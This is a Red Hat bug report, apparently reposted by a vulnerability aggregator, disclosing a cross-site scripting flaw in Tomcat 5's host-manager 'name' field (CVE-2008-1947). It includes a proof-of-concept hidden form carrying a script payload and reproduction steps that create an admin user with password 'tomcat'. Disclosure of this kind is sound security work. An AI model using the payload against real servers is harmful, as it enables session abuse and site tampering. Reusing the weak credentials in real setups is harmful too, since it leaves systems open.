REDHAT-BUG-446393: XSS

First published: Wed May 14 2008(Updated: )

Similarly as "alias" field in <a class="bz_bug_link bz_status_CLOSED bz_closed bz_public " title="CLOSED ERRATA - CVE-2007-3386 tomcat host manager xss" href="show_bug.cgi?id=247994">bug 247994</a> tomcat's host manager web interface suffers from javascript exploit in the "name" field: Assume that after logged in, the victim was lead to the malicious web server with following file installed. &lt;form action="<a href="http://localhost:8080/host-manager/html/add">http://localhost:8080/host-manager/html/add</a>" method="get"&gt; &lt;INPUT TYPE="hidden" NAME='name' VALUE="&lt;script&gt;alert()&lt;/script&gt;"&gt; &lt;INPUT TYPE="hidden" NAME='aliases' VALUE="somealias"&gt; &lt;input type="submit"&gt; &lt;/form&gt; Steps to reproduce: * install tomcat5 tomcat5-admin-webapps. * edit /etc/tomcat5/tomcat-users.xml and add &lt;role rolename="tomcat"/&gt; &lt;user username="tomcat" password="tomcat" roles="tomcat,admin"/&gt; * restart tomcat5 * Visit <a href="http://localhost:8080/host-manager/html/add">http://localhost:8080/host-manager/html/add</a> * login with user name tomcat and password tomcat * Enter the following: name: &lt;script&gt;alert("name-exploit!")&lt;/script&gt; alias: somealias * hit add. * You should see the javascript alert box popping up.

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

• agent/references
• agent/type
• agent/last-modified-date
• agent/first-publish-date
• collector/redhat-bugzilla
• source/Red Hat
• alias/CVE-2008-1947
• agent/severity
• agent/weakness
• agent/description
• agent/event
• agent/source
• agent/softwarecombine
• agent/tags
• agent/guess-ai
• agent/software-canonical-lookup
• agent/software-canonical-lookup-request
• vendor/apache
• canonical/tomcat